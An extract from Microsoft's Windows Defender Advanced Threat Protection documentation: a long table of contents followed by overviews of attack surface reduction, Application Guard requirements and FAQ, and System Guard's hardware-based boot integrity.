Threat Protection PDF

Contents
Threat protection
Windows Defender Advanced Threat Protection
Overview
Attack surface reduction
Hardware-based isolation
Application isolation
System integrity
Application control
Exploit protection
Network protection
Controlled folder access
Network firewall
Next generation protection
Endpoint detection and response
Security operations dashboard
Incidents queue
View and organize the Incidents queue
Manage incidents
Investigate incidents
Alerts queue
View and organize the Alerts queue
Manage alerts
Investigate alerts
Investigate files
Investigate machines
Investigate an IP address
Investigate a domain
Investigate a user account
Machines list
View and organize the Machines list
Manage machine group and tags
Alerts related to this machine
Machine timeline
Take response actions
Take response actions on a machine
Take response actions on a file
Automated investigation and remediation
Learn about the automated investigation and remediation dashboard
Secure score
Threat analytics
Advanced hunting
Query data using Advanced hunting
Advanced hunting reference
Advanced hunting query language best practices
Custom detections
Create custom detections rules
Management and APIs
Understand threat intelligence concepts
Windows Defender ATP APIs
Managed security service provider support
Microsoft threat protection
Protect users, data, and devices with conditional access
Microsoft Cloud App Security integration overview
Information protection in Windows overview
Microsoft Threat Experts
Portal overview
Get started
What's new in Windows Defender ATP
Minimum requirements
Validate licensing and complete setup
Preview features
Data storage and privacy
Assign user access to the portal
Evaluate Windows Defender ATP
Evaluate attack surface reduction
Application control
Exploit protection
Network Protection
Network firewall
Evaluate next generation protection
Access the Windows Defender Security Center Community Center
Configure and manage capabilities
Configure attack surface reduction
System isolation
Application isolation
Application control
Device control
Control USB devices
Device Guard
Exploit protection
Import/export configurations
Network protection
Attack surface reduction controls
Customize attack surface reduction
Network firewall
Configure next generation protection
Utilize Microsoft cloud-delivered protection
Enable cloud-delivered protection
Specify the cloud-delivered protection level
Configure and validate network connections
Enable Block at first sight
Configure the cloud block timeout period
Configure behavioral, heuristic, and real-time protection
Detect and block Potentially Unwanted Applications
Enable and configure always-on protection and monitoring
Antivirus on Windows Server 2016
Antivirus compatibility
Use limited periodic antivirus scanning
Deploy, manage updates, and report on antivirus
Deploy and enable antivirus
Report on antivirus protection
Manage updates and apply baselines
Customize, initiate, and review the results of scans and remediation
Configure and validate exclusions in antivirus scans
Configure scanning antivirus options
Configure remediation for scans
Configure scheduled scans
Configure and run scans
Review scan results
Run and review the results of an offline scan
Restore quarantined files
Manage antivirus in your business
Use Group Policy settings to configure and manage antivirus
Use System Center Configuration Manager and Microsoft Intune to configure
and manage antivirus
Use PowerShell cmdlets to configure and manage antivirus
Use Windows Management Instrumentation (WMI) to configure and manage
antivirus
Use the mpcmdrun.exe commandline tool to configure and manage antivirus
Manage scans and remediation
Configure and validate exclusions in antivirus scans
Configure scanning options
Configure scheduled scans
Configure and run scans
Review scan results
Run and review the results of an offline scan
Restore quarantined files
Manage next generation protection in your business
Use Microsoft Intune and System Center Configuration Manager to manage
next generation protection
Use Group Policy settings to manage next generation protection
Use PowerShell cmdlets to manage next generation protection
Use Windows Management Instrumentation (WMI) to manage next generation
protection
Use the mpcmdrun.exe command line tool to manage next generation
protection
Configure Secure score dashboard security controls
Management and API support
Onboard machines
Onboard previous versions of Windows
Onboard Windows 10 machines
Onboard servers
Onboard non-Windows machines
Onboard machines without Internet access
Run a detection test on a newly onboarded machine
Run simulated attacks on machines
Configure proxy and Internet connectivity settings
Troubleshoot onboarding issues
Windows Defender ATP API
Get started with Windows Defender ATP APIs
APIs
How to use APIs - Samples
Windows updates (KB) info
Get KbInfo collection
Common Vulnerabilities and Exposures (CVE) to KB map
Get CVE-KB map
API for custom alerts
Enable the custom threat intelligence application
Use the threat intelligence API to create custom alerts
Create custom threat intelligence alerts
PowerShell code examples
Python code examples
Experiment with custom threat intelligence alerts
Troubleshoot custom threat intelligence issues
Pull alerts to your SIEM tools
Enable SIEM integration
Configure Splunk to pull alerts
Configure HP ArcSight to pull alerts
Windows Defender ATP SIEM alert API fields
Pull alerts using SIEM REST API
Troubleshoot SIEM tool integration issues
Reporting
Create and build Power BI reports using Windows Defender ATP data
Threat protection reports
Machine health and compliance reports
Interoperability
Partner applications
Role-based access control
Manage portal access using RBAC
Configure managed security service provider (MSSP) support
Configure and manage Microsoft Threat Experts capabilities
Configure Microsoft threat protection integration
Configure conditional access
Configure Microsoft Cloud App Security integration
Configure information protection in Windows
Configure Windows Defender Security Center settings
General
Update data retention settings
Configure alert notifications
Enable and create Power BI reports using Windows Defender Security center
data
Enable Secure score security controls
Configure advanced features
Permissions
Use basic permissions to access the portal
APIs
Enable Threat intel
Enable SIEM integration
Rules
Manage suppression rules
Manage automation allowed/blocked lists
Manage indicators
Manage automation file uploads
Manage automation folder exclusions
Machine management
Onboarding machines
Offboarding machines
Configure Windows Defender Security Center time zone settings
Troubleshoot Windows Defender ATP
Troubleshoot sensor state
Check sensor state
Fix unhealthy sensors
Inactive machines
Misconfigured machines
Review sensor events and errors on machines with Event Viewer
Troubleshoot Windows Defender ATP service issues
Check service health
Troubleshoot attack surface reduction
Network protection
Attack surface reduction rules
Collect diagnostic data for files
Troubleshoot next generation protection
Security intelligence
Understand malware & other threats
Prevent malware infection
Malware names
Coin miners
Exploits and exploit kits
Fileless threats
Macro malware
Phishing
Ransomware
Rootkits
Supply chain attacks
Tech support scams
Trojans
Unwanted software
Worms
How Microsoft identifies malware and PUA
Submit files for analysis
Safety Scanner download
Industry antivirus tests
Industry collaboration programs
Virus information alliance
Microsoft virus initiative
Coordinated malware eradication
Information for developers
Software developer FAQ
Software developer resources
Windows Certifications
FIPS 140 Validations
Common Criteria Certifications
More Windows 10 security
The Windows Security app
Customize the Windows Security app for your organization
Hide Windows Security app notifications
Manage Windows Security app in Windows 10 in S mode
Virus and threat protection
Account protection
Firewall and network protection
App and browser control
Device security
Device performance and health
Family options
SmartScreen
SmartScreen Group Policy and mobile device management (MDM) settings
Set up and use SmartScreen on individual devices
Windows Defender Device Guard: virtualization-based security and WDAC
Control the health of Windows 10-based devices
Mitigate threats by using Windows 10 security features
Override Process Mitigation Options to help enforce app-related security policies
Use Windows Event Forwarding to help with intrusion detection
Block untrusted fonts in an enterprise
Security auditing
Basic security audit policies
Create a basic audit policy for an event category
Apply a basic audit policy on a file or folder
View the security event log
Basic security audit policy settings
Audit account logon events
Audit account management
Audit directory service access
Audit logon events
Audit object access
Audit policy change
Audit privilege use
Audit process tracking
Audit system events
Advanced security audit policies
Planning and deploying advanced security audit policies
Advanced security auditing FAQ
Which editions of Windows support advanced audit policy configuration
How to list XML elements in <EventData>
Using advanced security auditing options to monitor dynamic access control
objects
Advanced security audit policy settings
Audit Kerberos Authentication Service
Audit Kerberos Service Ticket Operations
Audit Other Account Logon Events
Audit Application Group Management
Audit Computer Account Management
Audit Distribution Group Management
Audit Other Account Management Events
Audit Security Group Management
Audit User Account Management
Audit DPAPI Activity
Audit PNP Activity
Audit Process Creation
Audit Process Termination
Audit RPC Events
Audit Detailed Directory Service Replication
Audit Directory Service Access
Audit Directory Service Changes
Audit Directory Service Replication
Audit Account Lockout
Audit User/Device Claims
Audit Group Membership
Audit IPsec Extended Mode
Audit IPsec Main Mode
Audit IPsec Quick Mode
Audit Logoff
Audit Logon
Audit Network Policy Server
Audit Other Logon/Logoff Events
Audit Special Logon
Audit Application Generated
Audit Certification Services
Audit Detailed File Share
Audit File Share
Audit File System
Audit Filtering Platform Connection
Audit Filtering Platform Packet Drop
Audit Handle Manipulation
Audit Kernel Object
Audit Other Object Access Events
Audit Registry
Audit Removable Storage
Audit SAM
Audit Central Access Policy Staging
Audit Audit Policy Change
Audit Authentication Policy Change
Audit Authorization Policy Change
Audit Filtering Platform Policy Change
Audit MPSSVC Rule-Level Policy Change
Audit Other Policy Change Events
Audit Sensitive Privilege Use
Audit Non Sensitive Privilege Use
Audit Other Privilege Use Events
Audit IPsec Driver
Audit Other System Events
Audit Security State Change
Audit Security System Extension
Audit System Integrity
Other Events
Appendix A: Security monitoring recommendations for many audit events
Registry (Global Object Access Auditing)
File System (Global Object Access Auditing)
Security policy settings
Administer security policy settings
Network List Manager policies
Configure security policy settings
Security policy settings reference
Account Policies
Password Policy
Account Lockout Policy
Kerberos Policy
Audit Policy
Security Options
Accounts: Administrator account status
Accounts: Block Microsoft accounts
Accounts: Guest account status
Accounts: Limit local account use of blank passwords to console logon only
Accounts: Rename administrator account
Accounts: Rename guest account
Audit: Audit the access of global system objects
Audit: Audit the use of Backup and Restore privilege
Audit: Force audit policy subcategory settings (Windows Vista or later) to
override audit policy category settings
Audit: Shut down system immediately if unable to log security audits
DCOM: Machine Access Restrictions in Security Descriptor Definition Language
(SDDL) syntax
DCOM: Machine Launch Restrictions in Security Descriptor Definition Language
(SDDL) syntax
Devices: Allow undock without having to log on
Devices: Allowed to format and eject removable media
Devices: Prevent users from installing printer drivers
Devices: Restrict CD-ROM access to locally logged-on user only
Devices: Restrict floppy access to locally logged-on user only
Domain controller: Allow server operators to schedule tasks
Domain controller: LDAP server signing requirements
Domain controller: Refuse machine account password changes
Domain member: Digitally encrypt or sign secure channel data (always)
Domain member: Digitally encrypt secure channel data (when possible)
Domain member: Digitally sign secure channel data (when possible)
Domain member: Disable machine account password changes
Domain member: Maximum machine account password age
Domain member: Require strong (Windows 2000 or later) session key
Interactive logon: Display user information when the session is locked
Interactive logon: Don't display last signed-in
Interactive logon: Don't display username at sign-in
Interactive logon: Do not require CTRL+ALT+DEL
Interactive logon: Machine account lockout threshold
Interactive logon: Machine inactivity limit
Interactive logon: Message text for users attempting to log on
Interactive logon: Message title for users attempting to log on
Interactive logon: Number of previous logons to cache (in case domain
controller is not available)
Interactive logon: Prompt user to change password before expiration
Interactive logon: Require Domain Controller authentication to unlock
workstation
Interactive logon: Require smart card
Interactive logon: Smart card removal behavior
Microsoft network client: Digitally sign communications (always)
SMBv1 Microsoft network client: Digitally sign communications (always)
SMBv1 Microsoft network client: Digitally sign communications (if server
agrees)
Microsoft network client: Send unencrypted password to third-party SMB
servers
Microsoft network server: Amount of idle time required before suspending
session
Microsoft network server: Attempt S4U2Self to obtain claim information
Microsoft network server: Digitally sign communications (always)
SMBv1 Microsoft network server: Digitally sign communications (always)
SMBv1 Microsoft network server: Digitally sign communications (if client
agrees)
Microsoft network server: Disconnect clients when logon hours expire
Microsoft network server: Server SPN target name validation level
Network access: Allow anonymous SID/Name translation
Network access: Do not allow anonymous enumeration of SAM accounts
Network access: Do not allow anonymous enumeration of SAM accounts and
shares
Network access: Do not allow storage of passwords and credentials for network
authentication
Network access: Let Everyone permissions apply to anonymous users
Network access: Named Pipes that can be accessed anonymously
Network access: Remotely accessible registry paths
Network access: Remotely accessible registry paths and subpaths
Network access: Restrict anonymous access to Named Pipes and Shares
Network access: Restrict clients allowed to make remote calls to SAM
Network access: Shares that can be accessed anonymously
Network access: Sharing and security model for local accounts
Network security: Allow Local System to use computer identity for NTLM
Network security: Allow LocalSystem NULL session fallback
Network security: Allow PKU2U authentication requests to this computer to use
online identities
Network security: Configure encryption types allowed for Kerberos Win7 only
Network security: Do not store LAN Manager hash value on next password
change
Network security: Force logoff when logon hours expire
Network security: LAN Manager authentication level
Network security: LDAP client signing requirements
Network security: Minimum session security for NTLM SSP based (including
secure RPC) clients
Network security: Minimum session security for NTLM SSP based (including
secure RPC) servers
Network security: Restrict NTLM: Add remote server exceptions for NTLM
authentication
Network security: Restrict NTLM: Add server exceptions in this domain
Network security: Restrict NTLM: Audit incoming NTLM traffic
Network security: Restrict NTLM: Audit NTLM authentication in this domain
Network security: Restrict NTLM: Incoming NTLM traffic
Network security: Restrict NTLM: NTLM authentication in this domain
Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers
Recovery console: Allow automatic administrative logon
Recovery console: Allow floppy copy and access to all drives and folders
Shutdown: Allow system to be shut down without having to log on
Shutdown: Clear virtual memory pagefile
System cryptography: Force strong key protection for user keys stored on the
computer
System cryptography: Use FIPS compliant algorithms for encryption, hashing,
and signing
System objects: Require case insensitivity for non-Windows subsystems
System objects: Strengthen default permissions of internal system objects (e.g.
Symbolic Links)
System settings: Optional subsystems
System settings: Use certificate rules on Windows executables for Software
Restriction Policies
User Account Control: Admin Approval Mode for the Built-in Administrator
account
User Account Control: Allow UIAccess applications to prompt for elevation
without using the secure desktop
User Account Control: Behavior of the elevation prompt for administrators in
Admin Approval Mode
User Account Control: Behavior of the elevation prompt for standard users
User Account Control: Detect application installations and prompt for elevation
User Account Control: Only elevate executables that are signed and validated
User Account Control: Only elevate UIAccess applications that are installed in
secure locations
User Account Control: Run all administrators in Admin Approval Mode
User Account Control: Switch to the secure desktop when prompting for
elevation
User Account Control: Virtualize file and registry write failures to per-user
locations
User Rights Assignment
Access Credential Manager as a trusted caller
Access this computer from the network
Act as part of the operating system
Add workstations to domain
Adjust memory quotas for a process
Allow log on locally
Allow log on through Remote Desktop Services
Back up files and directories
Bypass traverse checking
Change the system time
Change the time zone
Create a pagefile
Create a token object
Create global objects
Create permanent shared objects
Create symbolic links
Debug programs
Deny access to this computer from the network
Deny log on as a batch job
Deny log on as a service
Deny log on locally
Deny log on through Remote Desktop Services
Enable computer and user accounts to be trusted for delegation
Force shutdown from a remote system
Generate security audits
Impersonate a client after authentication
Increase a process working set
Increase scheduling priority
Load and unload device drivers
Lock pages in memory
Log on as a batch job
Log on as a service
Manage auditing and security log
Modify an object label
Modify firmware environment values
Perform volume maintenance tasks
Profile single process
Profile system performance
Remove computer from docking station
Replace a process level token
Restore files and directories
Shut down the system
Synchronize directory service data
Take ownership of files or other objects
Windows security guidance for enterprises
Windows security baselines
Security Compliance Toolkit
Get support
Windows security configuration framework
Level 5 enterprise security
Level 4 enterprise high security
Level 3 enterprise VIP security
Level 2 enterprise dev/ops workstation
Level 1 enterprise administrator workstation
MBSA removal and alternatives
Windows 10 Mobile security guide
Change history for Threat protection
Threat Protection
4/30/2019 • 2 minutes to read • Edit Online
Windows Defender Advanced Threat Protection (Windows Defender ATP ) is a unified platform for preventative
protection, post-breach detection, automated investigation, and response. Windows Defender ATP protects
endpoints from cyber threats; detects advanced attacks and data breaches, automates security incidents and
improves security posture.
NOTE
The Windows Defender Security Center is currently going through rebranding. All references to Windows Defender will be
replaced with Microsoft Defender. You will see the updates in the user interface and in the documentation library in next few
months.
Windows Defender ATP
Threat & Attack Next Endpoint Automated Microsoft

Vulnerability surface generation detection investigation Secure score Threat
Management reduction protection and response and Experts
remediation
Management and APIs
Microsoft Threat Protection
Threat & Vulnerability Management

This built-in capability uses a game-changing risk-based approach to the discovery, prioritization, and remediation
of endpoint vulnerabilities and misconfigurations.
Risk-based Threat & Vulnerability Management
What's in the dashboard and what it means for my organization
Configuration score
Scenarios
The attack surface reduction set of capabilities provide the first line of defense in the stack. By ensuring
configuration settings are properly set and exploit mitigation techniques are applied, these set of capabilities resist
attacks and exploitations.
Hardware based isolation
Application control
Device control
Exploit protection
Network protection
Network firewall
Attack surface reduction controls
To further reinforce the security perimeter of your network, Windows Defender ATP uses next generation
protection designed to catch all types of emerging threats.
Behavior monitoring
Cloud-based protection
Machine learning
URL Protection
Automated sandbox service
Endpoint detection and response capabilities are put in place to detect, investigate, and respond to advanced
threats that may have made it past the first two security pillars.
Alerts
Historical endpoint data
Response orchestration
Forensic collection
Threat intelligence
Advanced detonation and analysis service
Advanced hunting
Custom detection
Realtime and historical hunting
In conjunction with being able to quickly respond to advanced attacks, Windows Defender ATP offers automatic
investigation and remediation capabilities that help reduce the volume of alerts in minutes at scale.
Threat remediation
Manage automated investigations
Analyze automated investigation
Secure score
Windows Defender ATP includes a secure score to help you dynamically assess the security state of your
enterprise network, identify unprotected systems, and take recommended actions to improve the overall security
of your organization.
Asset inventory
Recommended improvement actions
Secure score
Threat analytics
Windows Defender ATP's new managed threat hunting service provides proactive hunting, prioritization and
additional context and insights that further empower Security Operation Centers (SOCs) to identify and respond
to threats quickly and accurately.
Targeted attack notification
Experts-on-demand
Configure your Microsoft Threat Experts managed hunting service
Management and APIs
Integrate Windows Defender Advanced Threat Protection into your existing workflows.
Onboarding
API and SIEM integration
Exposed APIs
Role-based access control (RBAC )
Reporting and trends
Windows Defender ATP is part of the Microsoft Threat Protection solution that helps implement end-to-end
security across possible attack surfaces in the modern workplace. Bring the power of Microsoft threat protection to
your organization.
Conditional access
O365 ATP
Azure ATP
Azure Security Center
Skype for Business
Microsoft Cloud App Security
Want to experience Windows Defender ATP? Sign up for a free trial.

For more info about Windows 10 Enterprise Edition features and functionality, see Windows 10 Enterprise
edition.
Windows Defender Advanced Threat Protection is a platform designed to help enterprise networks prevent,
detect, investigate, and respond to advanced threats.
Windows Defender ATP uses the following combination of technology built into Windows 10 and Microsoft's
robust cloud service:
Endpoint behavioral sensors: Embedded in Windows 10, these sensors collect and process behavioral
signals from the operating system and sends this sensor data to your private, isolated, cloud instance of
Windows Defender ATP.
Cloud security analytics: Leveraging big-data, machine-learning, and unique Microsoft optics across the
Windows ecosystem, enterprise cloud products (such as Office 365), and online assets, behavioral signals
are translated into insights, detections, and recommended responses to advanced threats.
Threat intelligence: Generated by Microsoft hunters, security teams, and augmented by threat
intelligence provided by partners, threat intelligence enables Windows Defender ATP to identify attacker
tools, techniques, and procedures, and generate alerts when these are observed in collected sensor data.
Threat & Attack Next Endpoint Automated Microsoft

Vulnerability surface generation detection investigation Secure score Threat
Management reduction protection and and Experts
response remediation
Management and APIs
TIP
Learn about the latest enhancements in Windows Defender ATP: What's new in Windows Defender ATP.
Windows Defender ATP demonstrated industry-leading optics and detection capabilities in the recent MITRE evaluation.
Read: Insights from the MITRE ATT&CK-based evaluation.

This built-in capability uses a game-changing risk-based approach to the discovery, prioritization, and remediation
of endpoint vulnerabilities and misconfigurations.
threats that may have made it past the first two security pillars. You can also do advanced hunting to create
custom threat intelligence and use a powerful search and query tool to hunt for possible threats in your
organization.
Secure score
Windows Defender ATP includes a secure score to help you dynamically assess the security state of your
enterprise network, identify unprotected systems, and take recommended actions to improve the overall security
Windows Defender ATP's new managed threat hunting service provides proactive hunting, prioritization, and
additional context and insights that further empower Security operation centers (SOCs) to identify and respond to
threats quickly and accurately.
Management and APIs
security across possible attack surfaces in the modern workplace. Bring the power of Microsoft threat protection
to your organization.
In this section
To help you maximize the effectiveness of the security platform, you can configure individual capabilities that
surface in Windows Defender Security Center.
TOPIC DESCRIPTION
Overview Understand the concepts behind the capabilities in Windows

Defender ATP so you take full advantage of the complete
threat protection platform.
Get started Learn about the requirements of the platform and the initial
steps you need to take to get started with Windows Defender
ATP.
Configure and manage capabilities Configure and manage the individual capabilities in Windows
Defender ATP.
TOPIC DESCRIPTION
Troubleshoot Windows Defender ATP Learn how to address issues that you might encounter while
using the platform.
Related topic
Windows Defender ATP helps detect sophisticated threats
Overview of Windows Defender ATP capabilities
Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP )
Understand the concepts behind the capabilities in Windows Defender ATP so you take full advantage of the
complete threat protection platform.
TIP
In this section
TOPIC DESCRIPTION
Threat & Vulnerability Management Reduce organizational vulnerability exposure and increase
threat resilience while seamlessly connecting workflows across
security stakeholders—security administrators, security
operations, and IT administrators in remediating threats.
Attack surface reduction Leverage the attack surface reduction capabilities to protect
the perimeter of your organization.
Next generation protection Learn about the antivirus capabilities in Windows Defender
ATP so you can protect desktops, portable computers, and
servers.
Endpoint detection and response Understand how Windows Defender ATP continuously
monitors your organization for possible attacks against
systems, networks, or users in your organization and the
features you can use to mitigate and remediate threats.
Automated investigation and remediation In conjunction with being able to quickly respond to advanced
attacks, Windows Defender ATP offers automatic investigation
and remediation capabilities that help reduce the volume of
alerts in minutes at scale.
Secure score Quickly assess the security posture of your organization, see
machines that require attention, as well as recommendations
for actions to better protect your organization - all in one
place.
Microsoft Threat Experts Managed cybersecurity threat hunting service. Learn how you
can get expert-driven insights and data through targeted
attack notification and access to experts on demand.
TOPIC DESCRIPTION
Advanced hunting Use a powerful search and query language to create custom
queries and detection rules.
Management and APIs Windows Defender ATP supports a wide variety of tools to
help you manage and interact with the platform so that you
can integrate the service into your existing workflows.
Microsoft Threat Protection Microsoft security products work better together. Learn about
other security capabilities in the Microsoft threat protection
stack.
Portal overview Learn to navigate your way around Windows Defender

Security Center.
Overview of attack surface reduction
Applies to:
Attack surface reduction capabilities in Windows Defender ATP helps protect the devices and applications in your
organization from new and emerging threats.
CAPABILITY DESCRIPTION
Hardware-based isolation Protects and maintains the integrity of the system as it starts
and while it's running, and validates system integrity through
local and remote attestation. In addition, container isolation
for Microsoft Edge helps protect host operating system from
malicious websites.
Application control Moves away from the traditional application trust model
where all applications are assumed trustworthy by default to
one where applications must earn trust in order to run.
Exploit protection Applies exploit mitigation techniques to apps your

organization uses, both individually and to all apps. Works
with third-party antivirus solutions and Windows Defender
Antivirus (Windows Defender AV)
Network protection Extends the malware and social engineering protection offered
by Windows Defender SmartScreen in Microsoft Edge to cover
network traffic and connectivity on your organization's
devices. Requires Windows Defender AV.
Controlled folder access Helps protect files in key system folders from changes made
by malicious and suspicious apps, including file-encrypting
ransomware malware. Requires Windows Defender AV.
Attack surface reduction reduce the attack surface of your applications with intelligent
rules that stop the vectors used by Office-, script- and mail-
based malware. Requires Windows Defender AV.
Network firewall Host-based, two-way network traffic filtering that blocks

unauthorized network traffic flowing into or out of the local
device.
Hardware-based isolation in Windows 10
Applies to: Windows Defender Advanced Threat Protection (Windows Defender ATP )
Hardware-based isolation helps protect system integrity in Windows 10 and is integrated with Windows Defender
ATP.
FEATURE DESCRIPTION
Windows Defender Application Guard Application Guard protects your device from advanced attacks
while keeping you productive. Using a unique hardware-based
isolation approach, the goal is to isolate untrusted websites
and PDF documents inside a lightweight container that is
separated from the operating system via the native Windows
Hypervisor. If an untrusted site or PDF document turns out to
be malicious, it still remains contained within Application
Guard’s secure container, keeping the desktop PC protected
and the attacker away from your enterprise data.
Windows Defender System Guard System Guard protects and maintains the integrity of the
system as it starts and after it's running, and validates system
integrity by using attestation.
Windows Defender Application Guard overview
Windows Defender Application Guard (Application Guard) is designed to help prevent old and newly emerging
attacks to help keep employees productive. Using our unique hardware isolation approach, our goal is to destroy
the playbook that attackers use by making current attack methods obsolete.
What is Application Guard and how does it work?

Designed for Windows 10 and Microsoft Edge, Application Guard helps to isolate enterprise-defined untrusted
sites, protecting your company while your employees browse the Internet. As an enterprise administrator, you
define what is among trusted web sites, cloud resources, and internal networks. Everything not on your list is
considered untrusted.
If an employee goes to an untrusted site through either Microsoft Edge or Internet Explorer, Microsoft Edge opens
the site in an isolated Hyper-V -enabled container, which is separate from the host operating system. This container
isolation means that if the untrusted site turns out to be malicious, the host PC is protected, and the attacker can't
get to your enterprise data. For example, this approach makes the isolated container anonymous, so an attacker
can't get to your employee's enterprise credentials.
What types of devices should use Application Guard?

Application Guard has been created to target several types of systems:
Enterprise desktops. These desktops are domain-joined and managed by your organization.
Configuration management is primarily done through System Center Configuration Manager or Microsoft
Intune. Employees typically have Standard User privileges and use a high-bandwidth, wired, corporate
network.
Enterprise mobile laptops. These laptops are domain-joined and managed by your organization.
Configuration management is primarily done through System Center Configuration Manager or Microsoft
Intune. Employees typically have Standard User privileges and use a high-bandwidth, wireless, corporate
network.
Bring your own device (BYOD ) mobile laptops. These personally-owned laptops are not domain-
joined, but are managed by your organization through tools like Microsoft Intune. The employee is typically
an admin on the device and uses a high-bandwidth wireless corporate network while at work and a
comparable personal network while at home.
Personal devices. These personally-owned desktops or mobile laptops are not domain-joined or managed
by an organization. The user is an admin on the device and uses a high-bandwidth wireless personal
network while at home or a comparable public network while outside.
Frequently Asked Questions
Q: Can I enable Application Guard on machines equipped with

4GB RAM?
A: We recommend 8GB RAM for optimal performance but you

may use the following registry DWORD values to enable
Application Guard on machines that aren't meeting the
recommended hardware configuration.
HKLM\software\Microsoft\Hvsi\SpecRequiredProcessorCount
- Default is 4 cores.
HKLM\software\Microsoft\Hvsi\SpecRequiredMemoryInGB -
Default is 8GB.
HKLM\software\Microsoft\Hvsi\SpecRequiredFreeDiskSpaceIn
GB - Default is 5GB.
Q: Can employees download documents from the Application

Guard Edge session onto host devices?
A: In Windows 10 Enterprise edition 1803, users will be able to

download documents from the isolated Application Guard
container to the host PC. This is managed by policy.
In Windows 10 Enterprise edition 1709 or Windows 10

Professional edition 1803, it is not possible to download files
from the isolated Application Guard container to the host PC.
However, employees can use the Print as PDF or Print as
XPS options and save those files to the host device.
Q: Can employees copy and paste between the host device and
the Application Guard Edge session?
A: Depending on your organization's settings, employees can
copy and paste images (.bmp) and text to and from the
isolated container.
Q: Why don't employees see their Favorites in the Application

Guard Edge session?
A: To help keep the Application Guard Edge session secure and

isolated from the host device, we don't copy the Favorites
stored in the Application Guard Edge session back to the host
device.
Q: Why aren’t employees able to see their Extensions in the

Application Guard Edge session?
A: Currently, the Application Guard Edge session doesn't support

Extensions. However, we're closely monitoring your feedback
about this.
Q: How do I configure WDAG to work with my network proxy

(IP-Literal Addresses)?
A: WDAG requires proxies to have a symbolic name, not just an

IP address. IP-Literal proxy settings such as “192.168.1.4:81”
can be annotated as “itproxy:81” or using a record such as
“P19216810010” for a proxy with an IP address of
192.168.100.10. This applies to Windows 10 Enterprise
edition, 1709 or higher.
Q: I enabled the hardware acceleration policy on my Windows 10

Enterprise, version 1803 deployment. Why are my users still
only getting CPU rendering?
A: This feature is currently experimental-only and is not

functional without an additional regkey provided by Microsoft.
If you would like to evaluate this feature on a deployment of
Windows 10 Enterprise, version 1803, please contact
Microsoft and we’ll work with you to enable the feature.
Q: What is the WDAGUtilityAccount local account?
A: This account is part of Application Guard beginning with

Windows 10 version 1709 (Fall Creators Update). This account
remains disabled until Application Guard is enabled on your
device. This item is integrated to the OS and is not considered
as a threat/virus/malware.
Related topics
TOPIC DESCRIPTION
System requirements for Windows Defender Application Specifies the pre-requisites necessary to install and use
Guard Application Guard.
Prepare and install Windows Defender Application Guard Provides instructions about determining which mode to use,
either Standalone or Enterprise-managed, and how to install
Application Guard in your organization.
Configure the Group Policy settings for Windows Defender Provides info about the available Group Policy and MDM
Application Guard settings.
Testing scenarios using Windows Defender Application Guard Provides a list of suggested testing scenarios that you can use
in your business or organization to test Windows Defender Application Guard (Application
Guard) in your organization.
System requirements for Windows Defender
Application Guard
The threat landscape is continually evolving. While hackers are busy developing new techniques to breach
enterprise networks by compromising workstations, phishing schemes remain one of the top ways to lure
employees into social engineering attacks. Windows Defender Application Guard is designed to help prevent old,
and newly emerging attacks, to help keep employees productive.
NOTE
Windows Defender Application Guard is not supported on VMs and VDI environment. For testing and automation on non-
production machines, you may enable WDAG on a VM by enabling Hyper-V nested virtualization on the host.
Hardware requirements
Your environment needs the following hardware to run Windows Defender Application Guard.
HARDWARE DESCRIPTION
64-bit CPU A 64-bit computer with minimum 4 cores (logical processors)

is required for hypervisor and virtualization-based security
(VBS). For more info about Hyper-V, see Hyper-V on Windows
Server 2016 or Introduction to Hyper-V on Windows 10. For
more info about hypervisor, see Hypervisor Specifications.
CPU virtualization extensions Extended page tables, also called Second Level Address
Translation (SLAT)
-AND-
One of the following virtualization extensions for VBS:
VT-x (Intel)
-OR-
AMD-V
Hardware memory Microsoft requires a minimum of 8GB RAM
Hard disk 5 GB free space, solid state disk (SSD) recommended
Input/Output Memory Management Unit (IOMMU) support Not required, but strongly recommended
Software requirements
Your environment needs the following software to run Windows Defender Application Guard.
SOFTWARE DESCRIPTION
Operating system Windows 10 Enterprise edition, version 1709 or higher

Windows 10 Professional edition, version 1803 or higher
Windows 10 Professional for Workstations edition, version
1803 or higher
Windows 10 Professional Education edition version 1803 or
higher
Windows 10 Education edition, version 1903 or higher
Browser Microsoft Edge and Internet Explorer
Management system Microsoft Intune

(only for managed devices)
-OR-
System Center Configuration Manager
-OR-
Group Policy
-OR-
Your current company-wide 3rd party mobile device

management (MDM) solution. For info about 3rd party MDM
solutions, see the documentation that came with your
product.
Windows Defender System Guard: How a hardware-
based root of trust helps protect Windows 10
In order to protect critical resources such as the Windows authentication stack, single sign-on tokens, the
Windows Hello biometric stack, and the Virtual Trusted Platform Module, a system's firmware and hardware must
be trustworthy.
Windows Defender System Guard reorganizes the existing Windows 10 system integrity features under one roof
and sets up the next set of investments in Windows security. It's designed to make these security guarantees:
Protect and maintain the integrity of the system as it starts up
Validate that system integrity has truly been maintained through local and remote attestation
Maintaining the integrity of the system as it starts

Static Root of Trust for Measurement (SRTM )
With Windows 7, one of the means attackers would use to persist and evade detection was to install what is often
referred to as a bootkit or rootkit on the system. This malicious software would start before Windows started, or
during the boot process itself, enabling it to start with the highest level of privilege.
With Windows 10 running on modern hardware (that is, Windows 8-certified or greater) a hardware-based root of
trust helps ensure that no unauthorized firmware or software (such as a bootkit) can start before the Windows
bootloader. This hardware-based root of trust comes from the device’s Secure Boot feature, which is part of the
Unified Extensible Firmware Interface (UEFI). This technique of measuring the static early boot UEFI components
is called the Static Root of Trust for Measurement (SRTM ).
As there are thousands of PC vendors that produce numerous models with different UEFI BIOS versions, there
becomes an incredibly large number of SRTM measurements upon bootup. Two techniques exist to establish trust
here—either maintain a list of known 'bad' SRTM measurements (also known as a blacklist), or a list of known
'good' SRTM measurements (also known as a whitelist). Each option has a drawback:
A list of known 'bad' SRTM measurements allows a hacker to change just 1 bit in a component to create an
entirely new SRTM hash that needs to be listed. This means that the SRTM flow is inherently brittle - a minor
change can invalidate the entire chain of trust.
A list of known 'good' SRTM measurements requires each new BIOS/PC combination measurement to be
carefully added, which is slow. In addition, a bug fix for UEFI code can take a long time to design, build, retest,
validate, and redeploy.
Secure Launch—the Dynamic Root of Trust for Measurement (DRTM )
Windows Defender System Guard Secure Launch, first introduced in Windows 10 version 1809, aims to alleviate
these issues by leveraging a technology known as the Dynamic Root of Trust for Measurement (DRTM ). DRTM
lets the system freely boot into untrusted code initially, but shortly after launches the system into a trusted state by
taking control of all CPUs and forcing them down a well-known and measured code path. This has the benefit of
allowing untrusted early UEFI code to boot the system, but then being able to securely transition into a trusted and
measured state.
